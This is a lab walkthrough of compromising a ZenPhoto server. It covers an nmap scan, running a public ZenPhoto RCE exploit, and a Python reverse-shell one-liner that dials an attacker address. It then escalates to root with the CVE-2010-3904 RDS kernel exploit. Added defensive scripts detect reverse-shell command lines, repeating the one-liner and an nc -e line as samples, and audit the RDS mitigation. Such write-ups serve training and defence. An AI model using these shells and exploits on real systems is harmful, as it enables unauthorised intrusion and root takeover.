# ZenPhoto

![](/files/-MRvUrNu1bPZUpBoIJNC)

## Nmap

```
sudo nmap 192.168.59.41 -sS -sV -p-

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp   open  ipp     CUPS 1.4
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## HTTP

Given the open ports we have and the versions running on them, I am going to jump straight into port 80.

![http://192.168.59.41/](/files/-MRfUawAj3bQ3cLN-aW0)

The root page of the target takes us to a blank page headed 'UNDER CONSTRUCTION'. The next step is directory enumeration and a `nikto` scan.

`feroxbuster` and `nikto` both pick up the directory /test/ and several subdirectories beneath it.

![Feroxbuster](/files/-MRfk6H0nD-vXGDo6rCt)

![Nikto](/files/-MRfkBF7Git3qqLKAgs2)

The /test/ directory takes us to the following page, which, as the footer in the bottom right shows, is running on ZenPhoto.

![](/files/-MRfkX-bDwGf22nhlEMd)

Viewing the page source and scrolling to the bottom reveals the exact version of ZenPhoto that the target is running.

![](/files/-MRfknPc5b31IBzJbnuI)

## Exploitation

A quick Google search for an exploit for this version of ZenPhoto turns up an RCE exploit.

{% embed url="https://www.exploit-db.com/exploits/18083" %}

I downloaded the exploit and ran it with the following syntax:

```
php exploit.php <Target-IP> <ZenPhoto-Dir>
```

![](/files/-MRfrST7T9FgctxJkvGN)

## Stable Shell

We now have a shell on the target machine, running as the user www-data. I found that this shell behaved unexpectedly when changing directories or running scripts.

I performed a quick check with `which python` to see if Python was installed. After confirming that it is, I tried a quick one-liner reverse shell to see if we could get a more stable one.

First I started a `netcat` listener on my attacking machine:

```
sudo nc -lvp 443
```

Then run the following command on the target machine, replacing `IP` with the address of the attacking machine:

```
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

We now have a more stable shell.

![](/files/-MRfwrKECHPuMv_vokOZ)
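From the defender's side, the one-liner above has a recognisable shape: an outbound `connect`, `os.dup2()` of the socket onto file descriptors 0 to 2, and a shell spawn, all in a single command line launched by the web server user. The following is an added example, not code from the original writeup: a small detector that labels Python and netcat style reverse-shell command lines and pulls out the address they dial to. The function names, the `pid=... uid=... cmd=...` record format and the sample log lines (including the attacker address 192.168.59.50) are constructed for illustration; on a real host you would feed it command lines from auditd `execve` records, EDR telemetry or `ps -eo pid,uid,args`.

```python
"""Added example (not part of the original writeup): flag reverse-shell
command lines like the Python one-liner used to stabilise the www-data
shell. Record format and sample lines are constructed for illustration."""
import re
from typing import Dict, List, Optional, Tuple

# A Python one-liner reverse shell needs all three of these in one command:
# an outbound connect, dup2() of the socket onto fds 0-2, and a shell spawn.
PY_CONNECT = re.compile(r"\.connect\(\s*\(")
PY_DUP2 = re.compile(r"os\.dup2\(")
PY_SHELL = re.compile(r"pty\.spawn\(|subprocess\.call\(|os\.system\(")
# Classic netcat form: nc/ncat with -e pointing at a shell binary.
NC_SHELL = re.compile(r"\bn(c|cat)\b.*\s-e\s*/bin/(ba)?sh\b")

# Destination extraction for each form.
PY_DEST = re.compile(r"connect\(\(\s*[\"']([^\"']+)[\"']\s*,\s*(\d+)")
NC_DEST = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)")

# Constructed record format: "pid=<n> uid=<n> cmd=<command line>".
LOG_LINE = re.compile(r"pid=(\d+) uid=(\d+) cmd=(.*)")


def classify(cmdline: str) -> Optional[str]:
    """Label a command line, or return None when nothing matches.

    All three Python features must be present together, so a plain
    socket connect in a script is not flagged on its own."""
    if ("python" in cmdline and PY_CONNECT.search(cmdline)
            and PY_DUP2.search(cmdline) and PY_SHELL.search(cmdline)):
        return "python-reverse-shell"
    if NC_SHELL.search(cmdline):
        return "netcat-reverse-shell"
    return None


def remote_endpoint(label: str, cmdline: str) -> Optional[Tuple[str, int]]:
    """Pull the (host, port) the shell dials out to, if it can be parsed."""
    pattern = PY_DEST if label == "python-reverse-shell" else NC_DEST
    m = pattern.search(cmdline)
    return (m.group(1), int(m.group(2))) if m else None


def scan(lines: List[str]) -> List[Dict]:
    """Return one record per flagged line: pid, uid, label, remote endpoint."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        pid, uid, cmd = m.groups()
        label = classify(cmd)
        if label:
            hits.append({"pid": pid, "uid": uid, "label": label,
                         "remote": remote_endpoint(label, cmd)})
    return hits


# Constructed sample records. uid 33 is www-data on Debian/Ubuntu; the
# attacker address 192.168.59.50 is made up for the example.
SAMPLE_LOG = [
    "pid=1201 uid=33 cmd=/usr/sbin/apache2 -k start",
    # The writeup's one-liner as the web server user would launch it.
    """pid=1340 uid=33 cmd=sh -c python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.59.50",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'""",
    # Near miss: a connect without dup2 or a shell spawn is not flagged.
    "pid=1355 uid=1000 cmd=python -c 'import socket;s=socket.socket();s.connect((\"10.0.0.2\",80))'",
    "pid=1402 uid=33 cmd=nc -e /bin/sh 192.168.59.50 4444",
    "pid=1410 uid=0 cmd=/usr/bin/python /usr/bin/lsb_release -a",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Two of the five constructed records are flagged, both running as uid 33; a web server account spawning an interactive shell that dials out is the signal worth alerting on, independent of which web application was exploited to get there.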

## Privilege Escalation

I then started a Python `SimpleHTTPServer` on my attacking machine and downloaded some privilege escalation scripts onto the target.

![](/files/-MRfxNgHIjDabtNvek3U)

I executed `suggester.sh`, which flagged the following exploit as 'highly probable'.

```
[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Exposure: highly probable
   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
```

{% embed url="https://www.exploit-db.com/exploits/15285" %}

I downloaded the file onto the attacking machine using `wget`, then compiled it using `gcc`.

```
gcc exploit.c -o exploit
```

After compiling finished, I used `chmod` to make the exploit executable.

```
chmod +x exploit
```

I then executed the exploit and was able to gain a root shell.

![](/files/-MRgQm7m_TPvzWhTKFQj)
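CVE-2010-3904 lives in the RDS protocol module, which the kernel auto-loads the first time a process opens an RDS socket, so a host is exposed even when the module is not currently loaded. The mitigation published at the time was to add `install rds /bin/true` to a file under `/etc/modprobe.d` so the module can never be loaded. The following is an added example, not code from the original writeup: an audit that checks a modprobe.d directory for that rule and a `/proc/modules`-style file for an already-loaded `rds`, and turns the two into a verdict. The function names and the fixture files (`weak/`, `hardened/`, `modules_loaded`, `modules_clean`, including the module size figure) are constructed so the example runs offline; on a real host pass `/etc/modprobe.d` and `/proc/modules`.

```python
"""Added example (not part of the original writeup): audit whether the RDS
kernel module abused by CVE-2010-3904 is disabled. Paths are parameters so
the check can run against the constructed fixtures built below."""
import os
import re
import tempfile
from typing import Dict

# "install rds /bin/true" (or /bin/false) makes modprobe run a no-op instead
# of loading the module, which is the documented mitigation for this CVE.
INSTALL_NOOP = re.compile(r"^\s*install\s+rds\s+/bin/(true|false)\b")


def rds_install_disabled(modprobe_dir: str) -> bool:
    """True if any *.conf in modprobe_dir maps rds to /bin/true or /bin/false."""
    if not os.path.isdir(modprobe_dir):
        return False
    for name in sorted(os.listdir(modprobe_dir)):
        if not name.endswith(".conf"):
            continue
        with open(os.path.join(modprobe_dir, name)) as fh:
            if any(INSTALL_NOOP.match(line) for line in fh):
                return True
    return False


def rds_loaded(proc_modules: str) -> bool:
    """True if 'rds' is listed as a loaded module (first column of /proc/modules)."""
    with open(proc_modules) as fh:
        return any(line.split()[:1] == ["rds"] for line in fh)


def assess(modprobe_dir: str, proc_modules: str) -> str:
    """Combine both checks into a verdict string."""
    if rds_loaded(proc_modules):
        # An install rule only blocks future loads; it does not unload the module.
        return "exposed: rds is loaded"
    if rds_install_disabled(modprobe_dir):
        return "mitigated: rds install rule present"
    return "at-risk: rds not loaded but can be auto-loaded on demand"


def build_fixture() -> Dict[str, str]:
    """Constructed stand-ins for /etc/modprobe.d and /proc/modules (not real host data)."""
    root = tempfile.mkdtemp()
    weak = os.path.join(root, "weak")
    hardened = os.path.join(root, "hardened")
    os.mkdir(weak)
    os.mkdir(hardened)
    with open(os.path.join(weak, "blacklist.conf"), "w") as fh:
        fh.write("blacklist floppy\n")  # unrelated entry only; nothing about rds
    with open(os.path.join(hardened, "disable-rds.conf"), "w") as fh:
        fh.write("# CVE-2010-3904 mitigation\ninstall rds /bin/true\n")
    loaded = os.path.join(root, "modules_loaded")
    clean = os.path.join(root, "modules_clean")
    with open(loaded, "w") as fh:  # module size and address are made up
        fh.write("rds 151552 0 - Live 0xffffffffa0100000\n"
                 "ext4 374784 1 - Live 0xffffffffa0000000\n")
    with open(clean, "w") as fh:
        fh.write("ext4 374784 1 - Live 0xffffffffa0000000\n")
    return {"weak": weak, "hardened": hardened, "loaded": loaded, "clean": clean}


if __name__ == "__main__":
    fx = build_fixture()
    print("hardened host:", assess(fx["hardened"], fx["clean"]))
    print("unpatched host:", assess(fx["weak"], fx["clean"]))
    print("module already loaded:", assess(fx["hardened"], fx["loaded"]))
```

The verdict distinguishes three states on purpose: the install rule is only useful on a host where `rds` is not already loaded, so an "exposed" result means the module has to be unloaded (or the host rebooted after the rule is in place) before the check can report "mitigated". Patching the kernel remains the real fix; the modprobe rule is the stop-gap for hosts that cannot be rebooted onto a fixed kernel yet.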
